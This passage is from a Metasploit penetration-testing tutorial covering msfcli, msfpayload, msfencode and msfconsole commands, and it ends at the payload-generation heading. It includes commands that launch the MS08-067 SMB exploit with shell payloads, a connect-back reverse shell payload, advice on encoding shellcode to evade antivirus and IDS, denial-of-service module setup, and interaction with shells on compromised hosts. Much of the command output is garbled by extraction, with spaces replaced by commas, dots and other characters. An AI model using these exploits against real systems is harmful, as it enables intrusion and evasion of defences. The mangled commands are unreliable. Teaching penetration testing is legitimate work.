Dejan Lukan evangeline.eleanor@gmail.

com

Contents
1 The Metasploit Architecture 1.1 Msfcli 1.2 Msfweb 1.3 Msfpayload 1.4 Msfencode 1.5 Msfconsole 1.5.1 1.5.2 1.5.3 1.5.4 The The The The back command check command connect command exploit command

1.5.5 The irb command 1.5.6 The jobs command 1.5.7 The load command 1.5.8 The unload command 1.5.9 The loadpath command 1.5.10 The resource command 1.5.11 The route command 1.5.12 1.5.13 1.5.14 1.5.15 The The The The info command use command set command unset command

1.5.16 The sessions command 1.5.17 The search command 1.5.18 The show command 1.5.19 The setg and unsetg command 1.6 Exploits 1.6.1 Active Exploits 1.6.2 Passive Exploits 1.6.3 Using Exploits 1.7 Payloads 1.7.1 Generating Payloads 2 Information Gathering 2.1 The Dradis Framework 2.2 Configuring Databases 2.3 Port Scanning 2.3.1 Importing Nmap Results into Metasploit

2.3.2 Nmap: The TCP Idle Scan 2.3.3 Metasploit Port Scanning 2.4 Targeted Scanning 2.4.1 Hunting for SMB 2.4.2 Hunting for MSSQL 2.4.3 Hunting for SSH 2.4.4 Hunting for FTP 2.4.5 SNMP Sweeping 2.4.6 Password Sniffing 2.5 Writing Your Own TCP Scanner 3 Vulnerability Scanning 3.1 Useful Commands 3.2 Nexpose 3.2.1 Scanning the Target Network 3.2.2 Nexpose in MSFConsole 3.3 Nessus 3.3.1 Installation and Configuration 3.3.2 Using Nessus 3.3.3 Importing Results Into the Metasploit 3.3.4 Scanning With Nessus From Metasploit 3.4 OpenVas 3.4.1 Gentoo Linux 3.4.2 Backtrack Linux 3.4.3 Administration 3.4.4 Configuration 3.5 Specialty Vulnerability Scanners 3.5.1 SMB Scanning 3.5.2 VNC Authentication 3.5.3 Open X11 3.5.4 WMAP Web Scanner 3.5.5 Autopwning 4 Meterpreter 4.1 Introduction 4.2 Meterpreter Commands 4.3 Doing interesting things with meterpreter 4.3.1 Capturing Keystrokes 4.3.2 Dumping Usernames and Passwords 4.3.3 Privilege Escalation 4.3.4 Token Impersonation 4.3.5 Pivoting onto Other Systems 4.3.6 Using Meterpreter Scripts 4.4 Meterpreter Scripting 5 Beyond Metasploit 5.1 Armitage 5.2 Social Engineering Toolkit - SET 5.2.1 Spear-Phishing Attack Vector 5.2.2 Teensy USB HID Attack Vector

1 The Metasploit Architecture

The picture of an architecture is given here:

We can see that there are many different interfaces to the metasploit framework

1.1 Msfcli
Is a command line interface to the framework. It runs directly from the command line, which allows you to perform input/output redirects into/from the msfcli. Msfcli can be convenient when testing modules or developing new exploits for the framework. Its a very good tool when you know exactly which exploit and options you need.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

#,msfcli3.7,4h Usage:,/usr/bin/msfcli3.7,<exploit_name>,<option=value>,[mode] ============================================================== , ,,,,Mode,,,,,,,,,,,Description ,,,,4444,,,,,,,,,,,44444444444 ,,,,(H)elp,,,,,,,,,You're,looking,at,it,baby! ,,,,(S)ummary,,,,,,Show,information,about,this,module ,,,,(O)ptions,,,,,,Show,available,options,for,this,module ,,,,(A)dvanced,,,,,Show,available,advanced,options,for,this,module ,,,,(I)DS,Evasion,,Show,available,ids,evasion,options,for,this,module ,,,,(P)ayloads,,,,,Show,available,payloads,for,this,module ,,,,(T)argets,,,,,,Show,available,targets,for,this,exploit,module ,,,,(AC)tions,,,,,,Show,available,actions,for,this,auxiliary,module ,,,,(C)heck,,,,,,,,Run,the,check,routine,of,the,selected,module ,,,,(E)xecute,,,,,,Execute,the,selected,module ,,,

So the syntax of the msfcli is: 1 2 msfcli3.7,<exploit_name>,<option=value>,[mode] ,,,

An example of running msfcli with the exploit and options is: 1 2 #,msfcli,windows/smb/ms08_067_netapi,RHOST=192.168.1.201,PAYLOAD=windows/shell/bind_tcp,E ,,,

If you arent sure which (O)ptions belong to a particular module, you can append the O to the command: 1 2 3 4 5 6 7 8 #,msfcli,windows/smb/ms08_067_netapi,O , ,,,Name,,,,,Current,Setting,,Required,,Description ,,,4444,,,,,444444444444444,,44444444,,44444444444 ,,,RHOST,,,,,,,,,,,,,,,,,,,,,yes,,,,,,,The,target,address ,,,RPORT,,,,445,,,,,,,,,,,,,,yes,,,,,,,Set,the,SMB,service,port ,,,SMBPIPE,,BROWSER,,,,,,,,,,yes,,,,,,,The,pipe,name,to,use,(BROWSER,,SRVSVC) ,,,

We can see that the module requires three options: RHOST, RPORT, SMBPIPE. If we want to look at all the available options, we can check the (A)dvanced option. To see what targets are supported with the chosen exploit, append the T to the command: 1 2 3 4 5 6 7 8 9 10 11 #,msfcli,windows/smb/ms08_067_netapi,T , ,,,Id,,Name ,,,44,,4444 ,,,0,,,Automatic,Targeting ,,,1,,,Windows,2000,Universal ,,,2,,,Windows,XP,SP0/SP1,Universal ,,,3,,,Windows,XP,SP2,English,(NX) ,,,4,,,Windows,XP,SP3,English,(NX) ,,,... ,,,

To display the payloads that are available to the current module, append the P to command: 1 2 #,msfcli,windows/smb/ms08_067_netapi,RHOST=192.168.1.1,P ,,,

When we have the final command, we can execute the exploit with the E argument: 1 2 #,msfcli,windows/smb/ms08_067_netapi,RHOST=192.168.1.1,PAYLOAD=windows/shell/bind_tcp,E ,,,

Msfcli is useful for specific tasks and convenient for testing and developing new exploits. Its excellent if you know exactly which exploit and options you need.

1.2 Msfweb
Is an AJAX web interface to the framework but has now been deprecated and removed from the metasploit trunk.

1.3 Msfpayload
The msfpayload component of metasploits allows us to generate shellcode, executables, etc. Shellcode can be generated in many formats including C, ruby, javascript, and visual basic. It depends on the problem youre working with, which payload format is the best. 1 2 3 4 5 6 7 8 9

msfpayload34h 3 3333Usage:3/usr/bin/msfpayload4.03[<options>]3<payload>3[var=val]3<[S]ummary|C|[P]erl|Rub[y]|[R]aw 3 OPTIONS: 3 33334h33333333Help3banner 33334l33333333List3available3payloads 333

If we want to list the required and optional variables for some specific payload, we can append the letter O to the arguments: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 #3msfpayload3windows/shell_reverse_tcp3O 3 3333333Name:3Windows3Command3Shell,3Reverse3TCP3Inline 33333Module:3payload/windows/shell_reverse_tcp 3333Version:38642 333Platform:3Windows 3333333Arch:3x86 Needs3Admin:3No 3Total3size:3314 3333333Rank:3Normal 3 Provided3by: 33vlad9023<vlad902@gmail.com> 33sf3<stephen_fewer@harmonysecurity.com> 3 Basic3options: Name333333Current3Setting33Required33Description 444433333344444444444444433444444443344444444444 EXITFUNC33process3333333333yes3333333Exit3technique:3seh,3thread,3none,3process LHOST3333333333333333333333yes3333333The3listen3address LPORT3333344443333333333333yes3333333The3listen3port 3 Description: 33Connect3back3to3attacker3and3spawn3a3command3shell 333

1.4 Msfencode
The shellcode generated by msfpayload is fully functional, but it contains several null characters that signify the end of string, which will cause the code to terminate before completion. In addition, shellcode traversing in cleartext is likely to be picked up by IDS and antivirus software. To address this problem, metasploit offers msfencode, which help us to avoid bad characters and evade antivirus and IDSs by encoding the original payload in a way that does not include bad characters. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

#,msfencode4.0,6h , ,,,,Usage:,/usr/bin/msfencode4.0,<options> , OPTIONS: , ,,,,6a,<opt>,,The,architecture,to,encode,as ,,,,6b,<opt>,,The,list,of,characters,to,avoid:,'\x00\xff' ,,,,6c,<opt>,,The,number,of,times,to,encode,the,data ,,,,6d,<opt>,,Specify,the,directory,in,which,to,look,for,EXE,templates ,,,,6e,<opt>,,The,encoder,to,use ,,,,6h,,,,,,,,Help,banner ,,,,6i,<opt>,,Encode,the,contents,of,the,supplied,file,path ,,,,6k,,,,,,,,Keep,template,working;,run,payload,in,new,thread,(use,with,6x) ,,,,6l,,,,,,,,List,available,encoders ,,,,6m,<opt>,,Specifies,an,additional,module,search,path ,,,,6n,,,,,,,,Dump,encoder,information ,,,,6o,<opt>,,The,output,file ,,,,6p,<opt>,,The,platform,to,encode,for ,,,,6s,<opt>,,The,maximum,size,of,the,encoded,data ,,,,6t,<opt>,,The,output,format:,raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe6small,elf,mac ,,,,6v,,,,,,,,Increase,verbosity ,,,,6x,<opt>,,Specify,an,alternate,executable,template ,,,

Metasploit contains a number of different encoders for specific situations. Some will be useful when you can use only alphanumeric characters as part of a payload, while others are general encoders that do well in every situation. We can list all of the encoders with the -l option. The only encoder that has a rank of excellent is the x86/shikata_ga_nai encoder, which you should use when in doubt.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

#,msfencode,5l , Framework,Encoders ================== , ,,,,Name,,,,,,,,,,,,,,,,,,,,Rank,,,,,,,Description ,,,,5555,,,,,,,,,,,,,,,,,,,,5555,,,,,,,55555555555 ,,,,cmd/generic_sh,,,,,,,,,,good,,,,,,,Generic,Shell,Variable,Substitution,Command,Encoder ,,,,cmd/ifs,,,,,,,,,,,,,,,,,low,,,,,,,,Generic,${IFS},Substitution,Command,Encoder ,,,,cmd/printf_php_mq,,,,,,,manual,,,,,printf(1),via,PHP,magic_quotes,Utility,Command,Encoder ,,,,generic/none,,,,,,,,,,,,normal,,,,,The,"none",Encoder ,,,,mipsbe/longxor,,,,,,,,,,normal,,,,,XOR,Encoder ,,,,mipsle/longxor,,,,,,,,,,normal,,,,,XOR,Encoder ,,,,php/base64,,,,,,,,,,,,,,great,,,,,,PHP,Base64,encoder ,,,,ppc/longxor,,,,,,,,,,,,,normal,,,,,PPC,LongXOR,Encoder ,,,,ppc/longxor_tag,,,,,,,,,normal,,,,,PPC,LongXOR,Encoder ,,,,sparc/longxor_tag,,,,,,,normal,,,,,SPARC,DWORD,XOR,Encoder ,,,,x64/xor,,,,,,,,,,,,,,,,,normal,,,,,XOR,Encoder ,,,,x86/alpha_mixed,,,,,,,,,low,,,,,,,,Alpha2,Alphanumeric,Mixedcase,Encoder ,,,,x86/alpha_upper,,,,,,,,,low,,,,,,,,Alpha2,Alphanumeric,Uppercase,Encoder ,,,,x86/avoid_utf8_tolower,,manual,,,,,Avoid,UTF8/tolower ,,,,x86/call4_dword_xor,,,,,normal,,,,,Call+4,Dword,XOR,Encoder ,,,,x86/context_cpuid,,,,,,,manual,,,,,CPUID5based,Context,Keyed,Payload,Encoder ,,,,x86/context_stat,,,,,,,,manual,,,,,stat(2)5based,Context,Keyed,Payload,Encoder ,,,,x86/context_time,,,,,,,,manual,,,,,time(2)5based,Context,Keyed,Payload,Encoder ,,,,x86/countdown,,,,,,,,,,,normal,,,,,Single5byte,XOR,Countdown,Encoder ,,,,x86/fnstenv_mov,,,,,,,,,normal,,,,,Variable5length,Fnstenv/mov,Dword,XOR,Encoder ,,,,x86/jmp_call_additive,,,normal,,,,,Jump/Call,XOR,Additive,Feedback,Encoder ,,,,x86/nonalpha,,,,,,,,,,,,low,,,,,,,,Non5Alpha,Encoder ,,,,x86/nonupper,,,,,,,,,,,,low,,,,,,,,Non5Upper,Encoder ,,,,x86/shikata_ga_nai,,,,,,excellent,,Polymorphic,XOR,Additive,Feedback,Encoder ,,,,x86/single_static_bit,,,manual,,,,,Single,Static,Bit ,,,,x86/unicode_mixed,,,,,,,manual,,,,,Alpha2,Alphanumeric,Unicode,Mixedcase,Encoder ,,,,x86/unicode_upper,,,,,,,manual,,,,,Alpha2,Alphanumeric,Unicode,Uppercase,Encoder ,,,

The nasm_shell.rb can be useful when trying to make sense of assembly code, especially during exploit development when we need to identify the opcodes (assembly instructions) for a given assembly command. 1 2 3 4 5 6 #,cd,/opt/framework54.0.0/msf3/tools #,./nasm_shell.rb nasm,>,jmp,esp 00000000,,FFE4,,,,,,,,,,,,,,jmp,esp nasm,> ,,,

1.5 Msfconsole
Is a command line interface to the framework. It allows you access to all of the options in the framework. It also supports command completion and execution of external commands. All of the options to the msfconsole can be seen by passing the -h option to msfconsole command:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

#,msfconsole,5h Usage:,msfconsole,[options] , Specific,options: ,,,,5d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Execute,the,console,as,defanged ,,,,5r,<filename>,,,,,,,,,,,,,,,,,,,,Execute,the,specified,resource,file ,,,,5o,<filename>,,,,,,,,,,,,,,,,,,,,Output,to,the,specified,file ,,,,5c,<filename>,,,,,,,,,,,,,,,,,,,,Load,the,specified,configuration,file ,,,,5m,<directory>,,,,,,,,,,,,,,,,,,,Specifies,an,additional,module,search,path ,,,,5p,<plugin>,,,,,,,,,,,,,,,,,,,,,,Load,a,plugin,on,startup ,,,,5y,,55yaml,<database.yml>,,,,,,,,Specify,a,YAML,file,containing,database,settings ,,,,5e,<production|development>,,,,,,Specify,the,database,environment,to,load,from,the,YAML ,,,,,,,,55environment ,,,,5v,,55version,,,,,,,,,,,,,,,,,,,,Show,version ,,,,5L,,55real5readline,,,,,,,,,,,,,,Use,the,system,Readline,library,instead,of,RbReadline ,,,,5n,,55no5database,,,,,,,,,,,,,,,,Disable,database,support ,,,,5q,,55quiet,,,,,,,,,,,,,,,,,,,,,,Do,not,print,the,banner,on,start,up , Common,options: ,,,,5h,,55help,,,,,,,,,,,,,,,,,,,,,,,Show,this,message , ,,,

To launch the msfconsole, just execute the msfconsole command like this: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 #,msfconsole3.7 , ,,,,,,,,,,,,,,,,__.,,,,,,,,,,,,,,,,,,,,,,,.__.,,,,,,,,.__.,__. ,,_____,,,_____/,,|______,,,,____________,|,,|,,,____,|__|/,,|_ ,/,,,,,\_/,__,\,,,__\__,,\,,/,,___/\____,\|,,|,,/,,_,\|,,\,,,__\ |,,Y,Y,,\,,___/|,,|,,/,__,\_\___,\,|,,|_>,>,,|_(,,<_>,),,||,,| |__|_|,,/\___,,>__|,(____,,/____,,>|,,,__/|____/\____/|__||__| ,,,,,,\/,,,,,\/,,,,,,,,,,\/,,,,,\/,|__| , , ,,,,,,,=[,metasploit,v3.7.05release,[core:3.7,api:1.0] +,55,55=[,684,exploits,5,355,auxiliary +,55,55=[,217,payloads,5,27,encoders,5,8,nops , msf,> ,,,

You can display available commands if you enter help at the msf command prompt:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41

msf.>.help . Core.Commands ============= . ....Command.......Description ....???????.......??????????? ....?.............Help.menu ....back..........Move.back.from.the.current.context ....banner........Display.an.awesome.metasploit.banner ....cd............Change.the.current.working.directory ....color.........Toggle.color ....connect.......Communicate.with.a.host ....exit..........Exit.the.console ....help..........Help.menu ....info..........Displays.information.about.one.or.more.module ....irb...........Drop.into.irb.scripting.mode ....jobs..........Displays.and.manages.jobs ....kill..........Kill.a.job ....load..........Load.a.framework.plugin ....loadpath......Searches.for.and.loads.modules.from.a.path ....makerc........Save.commands.entered.since.start.to.a.file ....quit..........Exit.the.console ....reload_all....Reloads.all.modules.from.all.defined.module.paths ....resource......Run.the.commands.stored.in.a.file ....route.........Route.traffic.through.a.session ....save..........Saves.the.active.datastores ....search........Searches.module.names.and.descriptions ....sessions......Dump.session.listings.and.display.information.about.sessions ....set...........Sets.a.variable.to.a.value ....setg..........Sets.a.global.variable.to.a.value ....show..........Displays.modules.of.a.given.type,.or.all.modules ....sleep.........Do.nothing.for.the.specified.number.of.seconds ....threads.......View.and.manipulate.background.threads ....unload........Unload.a.framework.plugin ....unset.........Unsets.one.or.more.variables ....unsetg........Unsets.one.or.more.global.variables ....use...........Selects.a.module.by.name ....version.......Show.the.framework.and.console.library.version.numbers . ...

Msfconsole also supports the tab completion which is really useful so you dont have to remember the exact name and path of the module you wish to use.

1.5.1 The back command

The back command can be used to move out of the current context: 1 2 3 msf.exploit(proftp_sreplace).>.back msf.> ...

1.5.2 The check command

The check command can be used to see if a target is vulnerable to a particular exploit instead of actually exploiting it. Not many modules support it.

1.5.3 The connect command

The connect command can connect to a remote host with ip address and port number within msfconsole the same as you would connect with netcat of telnet. With the -s argument, it can connect via SSL: 1 2 3 4 5 6 7 8 9 msf->-connect-4s-www.metasploit.com-443 [*]-Connected-to-www.metasploit.com:443 GET-/-HTTP/1.0 HTTP/1.1-302-Found Date:-Sat,-25-Jul-2009-05:03:42-GMT Server:-Apache/2.2.11 Location:-http://www.metasploit.org/ ---

1.5.4 The exploit command

When launching an exploit, you should issue the exploit command. With auxiliary module you can also use the run command.

1.5.5 The irb command

Running the irb command will drop you into a live ruby interpreter shell where you can issue commands and create metasploit scripts on the fly. 1 2 3 4 5 msf->-irb [*]-Starting-IRB-shell... >> ---

1.5.6 The jobs command

Jobs are modules that are running in the background. The jobs command provides the ability to list and terminate these jobs.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

msf.>.jobs.3h Usage:.jobs.[options] . Active.job.manipulation.and.interaction. . OPTIONS: . ....3K........Terminate.all.running.jobs. ....3h........Help.banner. ....3i.<opt>..Lists.detailed.information.about.a.running.job. ....3k.<opt>..Terminate.the.specified.job.name. ....3l........List.all.running.jobs. ....3v........Print.more.detailed.info...Use.with.3i.and.3l . msf.>.jobs . Jobs ==== . No.active.jobs. . msf.> ...

1.5.7 The load command

The load command loads a plugin from metasploits plugin directory. Arguments are passed as key=value on the shell. 1 2 3 4 5 6 >.load.pcap_log [3].MissingSourceFile:.no.such.file.to.load.33.pcaprub [*].PcapLog.plugin.loaded. [*].Successfully.loaded.plugin:.pcap_log msf.> ...

1.5.8 The unload command

The unload command unloads a previously loaded plugin and removes any extended commands. 1 2 3 4 msf.>.unload.pcap_log Unloading.plugin.pcap_log...unloaded. msf.> ...

1.5.9 The loadpath command

The loadpath command will load a third-party module tree for the path so you can point metasploit at your 0day exploits, encoders, payloads, etc.

1 2 3 4

msf(>(loadpath(/home/secret/modules ( Loaded(0(modules. (((

1.5.10 The resource command

The resource command will load and execute the resource batch file - basic scripting for msfconsole. Batch files can greatly speed up testing and development times as well as allow the user to automate many tasks. Lets create a simple batch file that will display the version of metasploit. 1 2 #(echo(version(>(version.rc (((

And then run it: 1 2 3 4 5 msf(>(resource(version.rc resource((version.rc)>(version Framework:(3.7.0Erelease.12521 Console((:(3.7.0Erelease.12467 (((

1.5.11 The route command

The route commands allows you to route sockets through a session or comm providing basic pivoting capabilities. To add a route, just pass the target subnet and network mask followed by the session (comm) number: 1 2 3 4 5 6 7 msf(>(route Usage:(route([add/remove/get/flush/print](subnet(netmask([comm/sid] ( Route(traffic(destined(to(a(given(subnet(through(a(supplied(session. The(default(comm(is(Local. msf(>(route(add(192.168.1.0(255.255.255.0(2 (((

1.5.12 The info command

The info command will provide a detailed information about a particular module including all options, targets, and other information.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

msf.>.info.dos/windows/smb/ms09_001_write . .......Name:.Microsoft.SRV.SYS.WriteAndX.Invalid.DataOffset .....Module:.auxiliary/dos/windows/smb/ms09_001_write ....Version:.10394 ....License:.Metasploit.Framework.License.(BSD) .......Rank:.Normal . Provided.by: ..j.v.vallejo.<j.v.vallejo@gmail.com> . Basic.options: ..Name...Current.Setting..Required..Description ..^^^^...^^^^^^^^^^^^^^^..^^^^^^^^..^^^^^^^^^^^ ..RHOST...................yes.......The.target.address ..RPORT..445..............yes.......Set.the.SMB.service.port ...

1.5.13 The use command

When you want to use a particular module, you issue the use command to select it. The use command changes the context to a specific module, exposing type-specific commands. 1 2 3 4 5 6 7 8 9 10 11 12 msf.>.use.dos/windows/smb/ms09_001_write msf.auxiliary(ms09_001_write).>.show.options . Module.options.(auxiliary/dos/windows/smb/ms09_001_write): . ...Name...Current.Setting..Required..Description ...^^^^...^^^^^^^^^^^^^^^..^^^^^^^^..^^^^^^^^^^^ ...RHOST...................yes.......The.target.address ...RPORT..445..............yes.......Set.the.SMB.service.port . msf.auxiliary(ms09_001_write).> ...

1.5.14 The set command

The set command allows you to configure framework options and parameters for the current module youre working with. 1 2 3 4 5 6 7 8 9 10 11 msf.auxiliary(ms09_001_write).>.set.RHOST.192.168.1.1 RHOST.=>.192.168.1.1 msf.auxiliary(ms09_001_write).>.show.options . Module.options.(auxiliary/dos/windows/smb/ms09_001_write): . ...Name...Current.Setting..Required..Description ...^^^^...^^^^^^^^^^^^^^^..^^^^^^^^..^^^^^^^^^^^ ...RHOST..192.168.1.1......yes.......The.target.address ...RPORT..445..............yes.......Set.the.SMB.service.port ...

You can also set an encoder to use at runtime, which is very useful in exploit development when you arent quite sure which payload encoding methods will work with an exploit.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39

msf.auxiliary(ms09_001_write).>.show.encoders . Encoders ======== . ...Name....................Disclosure.Date..Rank.......Description ...IIII....................IIIIIIIIIIIIIII..IIII.......IIIIIIIIIII ...cmd/generic_sh...........................good.......Generic.Shell.Variable.Substitution.Comman ...cmd/ifs..................................low........Generic.${IFS}.Substitution.Command.Encode ...cmd/printf_php_mq........................good.......printf(1).via.PHP.magic_quotes.Utility.Com ...generic/none.............................normal.....The."none".Encoder ...mipsbe/longxor...........................normal.....XOR.Encoder ...mipsle/longxor...........................normal.....XOR.Encoder ...php/base64...............................great......PHP.Base64.encoder ...ppc/longxor..............................normal.....PPC.LongXOR.Encoder ...ppc/longxor_tag..........................normal.....PPC.LongXOR.Encoder ...sparc/longxor_tag........................normal.....SPARC.DWORD.XOR.Encoder ...x64/xor..................................normal.....XOR.Encoder ...x86/alpha_mixed..........................low........Alpha2.Alphanumeric.Mixedcase.Encoder ...x86/alpha_upper..........................low........Alpha2.Alphanumeric.Uppercase.Encoder ...x86/avoid_utf8_tolower...................manual.....Avoid.UTF8/tolower ...x86/call4_dword_xor......................normal.....Call+4.Dword.XOR.Encoder ...x86/context_cpuid........................manual.....CPUIDIbased.Context.Keyed.Payload.Encoder ...x86/context_stat.........................manual.....stat(2)Ibased.Context.Keyed.Payload.Encode ...x86/context_time.........................manual.....time(2)Ibased.Context.Keyed.Payload.Encode ...x86/countdown............................normal.....SingleIbyte.XOR.Countdown.Encoder ...x86/fnstenv_mov..........................normal.....VariableIlength.Fnstenv/mov.Dword.XOR.Enco ...x86/jmp_call_additive....................normal.....Jump/Call.XOR.Additive.Feedback.Encoder ...x86/nonalpha.............................low........NonIAlpha.Encoder ...x86/nonupper.............................low........NonIUpper.Encoder ...x86/shikata_ga_nai.......................excellent..Polymorphic.XOR.Additive.Feedback.Encoder ...x86/single_static_bit....................manual.....Single.Static.Bit ...x86/unicode_mixed........................manual.....Alpha2.Alphanumeric.Unicode.Mixedcase.Enco ...x86/unicode_upper........................manual.....Alpha2.Alphanumeric.Unicode.Uppercase.Enco . msf.auxiliary(ms09_001_write).>.set.encoder.x86/shikata_ga_nai encoder.=>.x86/shikata_ga_nai msf.auxiliary(ms09_001_write).> ...

1.5.15 The unset command

The unset command removes a parameter previously configured with set. You can remove all assigned variables with "unset all".

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

msf.auxiliary(ms09_001_write).>.show.options . Module.options.(auxiliary/dos/windows/smb/ms09_001_write): . ...Name...Current.Setting..Required..Description ...NNNN...NNNNNNNNNNNNNNN..NNNNNNNN..NNNNNNNNNNN ...RHOST..192.168.1.1......yes.......The.target.address ...RPORT..445..............yes.......Set.the.SMB.service.port . msf.auxiliary(ms09_001_write).>.unset.RHOST Unsetting.RHOST... msf.auxiliary(ms09_001_write).>.show.options . Module.options.(auxiliary/dos/windows/smb/ms09_001_write): . ...Name...Current.Setting..Required..Description ...NNNN...NNNNNNNNNNNNNNN..NNNNNNNN..NNNNNNNNNNN ...RHOST...................yes.......The.target.address ...RPORT..445..............yes.......Set.the.SMB.service.port ...

1.5.16 The sessions command

The sessions command allows you to operate with spawned sessions, which can be: shells, meterpreter, VNC, etc. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 msf.auxiliary(ms09_001_write).>.sessions.Nh Usage:.sessions.[options] . Active.session.manipulation.and.interaction. . OPTIONS: . ....NK........Terminate.all.sessions ....Nc.<opt>..Run.a.command.on.the.session.given.with.Ni,.or.all ....Nd.<opt>..Detach.an.interactive.session ....Nh........Help.banner ....Ni.<opt>..Interact.with.the.supplied.session.ID ....Nk.<opt>..Terminate.session ....Nl........List.all.active.sessions ....Nq........Quiet.mode ....Nr........Reset.the.ring.buffer.for.the.session.given.with.Ni,.or.all ....Ns.<opt>..Run.a.script.on.the.session.given.with.Ni,.or.all ....Nu.<opt>..Upgrade.a.win32.shell.to.a.meterpreter.session ....Nv ...

To list any active sessions, use the -l option: 1 2 3 4 5 6 7 8 9 msf.>.sessions.Nl . Active.sessions =============== . ..Id..Description....Tunnel ..NN..NNNNNNNNNNN....NNNNNN ..1...Command.shell..192.168.1.101:33191.N>.192.168.1.104:4444 ...

To interact with a given session, you just need to use the -i option followed by the ID number of the session:

1 2 3 4 5

msf)>)sessions)/i)1 [*])Starting)interaction)with)1... ) C:\WINDOWS\system32> )))

1.5.17 The search command

The search command provides a regular expression search functionality. The search function will locate this string within the module names, descriptions, references, etc. 1 2 3 4 5 6 7 8 9 10 11

msf)>)search)ms09/001 [*])Searching)loaded)modules)for)pattern)'ms09/001'... ) Auxiliary ========= ) )))Name))))))))))))))))))))))))))))Disclosure)Date))Rank))))Description )))////))))))))))))))))))))))))))))///////////////))////))))/////////// )))dos/windows/smb/ms09_001_write)))))))))))))))))))normal))Microsoft)SRV.SYS)WriteAndX)Invalid)D ) )))

1.5.18 The show command

The show command will display every available module in metasploit. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

msf)>)show ) Encoders ======== ) )))Name))))))))))))))))))))Disclosure)Date))Rank)))))))Description )))////))))))))))))))))))))///////////////))////)))))))/////////// )))cmd/generic_sh)))))))))))))))))))))))))))good)))))))Generic)Shell)Variable)Substitution)Comman )))cmd/ifs))))))))))))))))))))))))))))))))))low))))))))Generic)${IFS})Substitution)Command)Encode )))cmd/printf_php_mq))))))))))))))))))))))))good)))))))printf(1))via)PHP)magic_quotes)Utility)Com )))generic/none)))))))))))))))))))))))))))))normal)))))The)"none")Encoder )))mipsbe/longxor)))))))))))))))))))))))))))normal)))))XOR)Encoder )))mipsle/longxor)))))))))))))))))))))))))))normal)))))XOR)Encoder )))php/base64)))))))))))))))))))))))))))))))great))))))PHP)Base64)encoder )))ppc/longxor))))))))))))))))))))))))))))))normal)))))PPC)LongXOR)Encoder )))ppc/longxor_tag))))))))))))))))))))))))))normal)))))PPC)LongXOR)Encoder )))sparc/longxor_tag))))))))))))))))))))))))normal)))))SPARC)DWORD)XOR)Encoder )))x64/xor))))))))))))))))))))))))))))))))))normal)))))XOR)Encoder ... )))

Valid parameters for the "show" command are: all encoders nops exploits: display all exploits payloads: display all payloads for all platforms

auxiliary: display available auxiliary modules targets: display potential targets plugins options Additional module-specific parameters are: advanced, evasion, targets, actions When you are in the context of a particular module, the "show payloads" will only display the payloads that are compatible with that particular exploit. For example, if it is a windows exploit, it will not shown the linux payloads. If you have selected a specific module, you can issue the "show options" command to display which settings are available and required for that module. If you dont know if an operating system is vulnerable to a particular exploit, run the "show targets" command from within the context of an exploit module to see which targets are supported. To see the more advanced options run "show advanced".

1.5.19 The setg and unsetg command

To set a global variable within msfconsole, you can execute setg command. Once these are set, you can use them in as many exploits and auxiliary modules as you like. 1 2 3 4 5 6 7 msf+>+setg+LHOST+192.168.1.101 LHOST+=>+192.168.1.101 msf+>+setg+RHOSTS+192.168.1.0/24 RHOSTS+=>+192.168.1.0/24 msf+>+setg+RHOST+192.168.1.136 RHOST+=>+192.168.1.136 +++

After setting your different variables, you can run the save command to save your current environment and settings. With your settings saved, they will be automatically loaded on startup which saves you from having to set everything again. We unsetg command is used to unset a global parameter.

1.6 Exploits
The exploits can be divided into two groups: active passive

1.6.1 Active Exploits

Active exploits will exploit a specific host, run until completion and then exit. bruteforce modules will exit when a shell opens from the victim module execution stops if an error is encountered you can force an active module to the background by passing the -j to the exploit command

1.6.2 Passive Exploits

Passive exploits wait for incoming hosts and exploit them as they connect. passive exploits almost always focus on clients such as web browsers, FTP clients, etc they can also be used in conjunction with email exploits waiting for connections passive exploits report shells, which can be enumerated (option -l) and interacted with (option -i) Example: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 msf.exploit(ani_loadimage_chunksize).>.sessions.Cl . Active.sessions =============== . ..Id..Description..Tunnel ..CC..CCCCCCCCCCC..CCCCCC ..1...Meterpreter..192.168.1.101:52647.C>.192.168.1.104:4444 . msf.exploit(ani_loadimage_chunksize).>.sessions.Ci.1 [*].Starting.interaction.with.1... . meterpreter.> ...

1.6.3 Using Exploits

Selecting an exploit in metasploit adds the exploit and check commands to msfconsole: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 msf.>.use.exploit/windows/smb/ms08_067_netapi msf.exploit(ms08_067_netapi).>.help Exploit.Commands ================ . ....Command.......Description ....CCCCCCC.......CCCCCCCCCCC ....check.........Check.to.see.if.a.target.is.vulnerable ....exploit.......Launch.an.exploit.attempt ....rcheck........Reloads.the.module.and.checks.if.the.target.is.vulnerable ....rexploit......Reloads.the.module.and.launches.an.exploit.attempt . msf.exploit(ms08_067_netapi).> ...

There are also multiple show commands available:

1 2 3 4 5 6

>(show(targets >(show(payloads >(show(options >(show(advanced >(show(evasion

1.7 Payloads
There are three different types of payload module types in metasploit: Singles: payloads that are standalone - for example: adding a user to the target system Stagers: payloads that setup a network connection between the attacker and victim Stages: payload components that are downloaded by stagers modules - the various payload stages provide advanced features with no size limits Whether or not a payload is staged, is represented by / in the payload name.

1.7.1 Generating Payloads

